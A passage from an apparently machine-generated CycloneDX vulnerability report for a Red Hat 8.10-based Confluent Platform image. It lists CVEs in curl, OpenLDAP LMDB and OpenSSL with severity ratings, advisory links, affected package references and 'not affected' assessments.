          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/device-mapper-libs@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/device-mapper@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/device-mapper-libs@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/device-mapper@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/device-mapper-libs@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/device-mapper@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/device-mapper-libs@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/device-mapper@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/device-mapper-libs@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/device-mapper@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/device-mapper-libs@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/device-mapper@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/device-mapper-libs@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/device-mapper@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/device-mapper-libs@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/device-mapper@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/device-mapper-libs@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/device-mapper@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/device-mapper-libs@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/device-mapper@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/device-mapper-libs@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/device-mapper@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/device-mapper-libs@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/device-mapper@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/device-mapper-libs@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/device-mapper@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/device-mapper-libs@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/device-mapper@1.02.181-15.el8_10.3?arch=x86_64&distro=redhat-8.10&epoch=8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-1965",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.8,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        305
      ],
      "description": "libcurl can in some circumstances reuse the wrong connection when asked to do\nan Negotiate-authenticated HTTP or HTTPS request.\n\nlibcurl features a pool of recent connections so that subsequent requests can\nreuse an existing connection to avoid overhead.\n\nWhen reusing a connection a range of criterion must first be met. Due to a\nlogical error in the code, a request that was issued by an application could\nwrongfully reuse an existing connection to the same server that was\nauthenticated using different credentials. One underlying reason being that\nNegotiate sometimes authenticates *connections* and not *requests*, contrary\nto how HTTP is designed to work.\n\nAn application that allows Negotiate authentication to a server (that responds\nwanting Negotiate) with `user1:password1` and then does another operation to\nthe same server also using Negotiate but with `user2:password2` (while the\nprevious connection is still alive) - the second request wrongly reused the\nsame connection and since it then sees that the Negotiate negotiation is\nalready made, it just sends the request over that connection thinking it uses\nthe user2 credentials when it is in fact still using the connection\nauthenticated for user1...\n\nThe set of authentication methods to use is set with  `CURLOPT_HTTPAUTH`.\n\nApplications can disable libcurl's reuse of connections and thus mitigate this\nproblem, by using one of the following libcurl options to alter how\nconnections are or are not reused: `CURLOPT_FRESH_CONNECT`,\n`CURLOPT_MAXCONNECTS` and `CURLMOPT_MAX_HOST_CONNECTIONS` (if using the\ncurl_multi API).",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-1965"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:55439"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-1965"
        },
        {
          "url": "https://bugzilla.redhat.com/2446448"
        },
        {
          "url": "https://bugzilla.redhat.com/2446450"
        },
        {
          "url": "https://bugzilla.redhat.com/2496758"
        },
        {
          "url": "https://bugzilla.redhat.com/2496763"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2446448"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2446450"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2496758"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2496763"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-1965.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-1965.json"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1965"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3783"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-8286"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-9547"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-55439.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:55439"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-1965.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-55450.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1965"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8084-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8099-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-1965"
        }
      ],
      "published": "2026-03-11T11:15:59+00:00",
      "updated": "2026-06-17T10:16:47+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-22185",
      "ratings": [
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.8,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        125,
        191
      ],
      "description": "OpenLDAP Lightning Memory-Mapped Database (LMDB) versions up to and including 0.9.14, prior to commit 8e1fda8, contain a heap buffer underflow in the readline() function of mdb_load. When processing malformed input containing an embedded NUL byte, an unsigned offset calculation can underflow and cause an out-of-bounds read of one byte before the allocated heap buffer. This can cause mdb_load to crash, leading to a limited denial-of-service condition.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-22185"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-22185"
        },
        {
          "url": "https://bugs.openldap.org/show_bug.cgi?id=10421"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22185"
        },
        {
          "url": "https://seclists.org/fulldisclosure/2026/Jan/5"
        },
        {
          "url": "https://seclists.org/fulldisclosure/2026/Jan/8"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-22185"
        },
        {
          "url": "https://www.openldap.org/"
        },
        {
          "url": "https://www.vulncheck.com/advisories/openldap-lmdb-mdb-load-heap-buffer-underflow-in-readline"
        }
      ],
      "published": "2026-01-07T21:16:01+00:00",
      "updated": "2026-06-17T10:19:30+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openldap@2.4.46-21.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.4.46-21.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/openldap@2.4.46-21.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/openldap@2.4.46-21.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/openldap@2.4.46-21.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/openldap@2.4.46-21.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/openldap@2.4.46-21.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/openldap@2.4.46-21.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/openldap@2.4.46-21.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/openldap@2.4.46-21.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/openldap@2.4.46-21.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/openldap@2.4.46-21.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/openldap@2.4.46-21.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/openldap@2.4.46-21.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/openldap@2.4.46-21.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/openldap@2.4.46-21.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/openldap@2.4.46-21.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/openldap@2.4.46-21.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/openldap@2.4.46-21.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/openldap@2.4.46-21.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/openldap@2.4.46-21.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/openldap@2.4.46-21.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/openldap@2.4.46-21.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-22795",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        754
      ],
      "description": "Issue summary: An invalid or NULL pointer dereference can happen in\nan application processing a malformed PKCS#12 file.\n\nImpact summary: An application processing a malformed PKCS#12 file can be\ncaused to dereference an invalid or NULL pointer on memory read, resulting\nin a Denial of Service.\n\nA type confusion vulnerability exists in PKCS#12 parsing code where\nan ASN1_TYPE union member is accessed without first validating the type,\ncausing an invalid pointer read.\n\nThe location is constrained to a 1-byte address space, meaning any\nattempted pointer manipulation can only target addresses between 0x00 and 0xFF.\nThis range corresponds to the zero page, which is unmapped on most modern\noperating systems and will reliably result in a crash, leading only to a\nDenial of Service. Exploiting this issue also requires a user or application\nto process a maliciously crafted PKCS#12 file. It is uncommon to accept\nuntrusted PKCS#12 files in applications as they are usually used to store\nprivate keys which are trusted by definition. For these reasons, the issue\nwas assessed as Low severity.\n\nThe FIPS modules in 3.5, 3.4, 3.3 and 3.0 are not affected by this issue,\nas the PKCS12 implementation is outside the OpenSSL FIPS module boundary.\n\nOpenSSL 3.6, 3.5, 3.4, 3.3, 3.0 and 1.1.1 are vulnerable to this issue.\n\nOpenSSL 1.0.2 is not affected by this issue.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-22795"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:1473"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-22795"
        },
        {
          "url": "https://bugzilla.redhat.com/2430375"
        },
        {
          "url": "https://bugzilla.redhat.com/2430376"
        },
        {
          "url": "https://bugzilla.redhat.com/2430377"
        },
        {
          "url": "https://bugzilla.redhat.com/2430378"
        },
        {
          "url": "https://bugzilla.redhat.com/2430379"
        },
        {
          "url": "https://bugzilla.redhat.com/2430380"
        },
        {
          "url": "https://bugzilla.redhat.com/2430381"
        },
        {
          "url": "https://bugzilla.redhat.com/2430386"
        },
        {
          "url": "https://bugzilla.redhat.com/2430387"
        },
        {
          "url": "https://bugzilla.redhat.com/2430388"
        },
        {
          "url": "https://bugzilla.redhat.com/2430389"
        },
        {
          "url": "https://bugzilla.redhat.com/2430390"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430375"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430376"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430377"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430378"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430379"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430380"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430381"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430386"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430387"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430388"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430389"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430390"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-265688.html"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-11187"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15467"
        },
        {
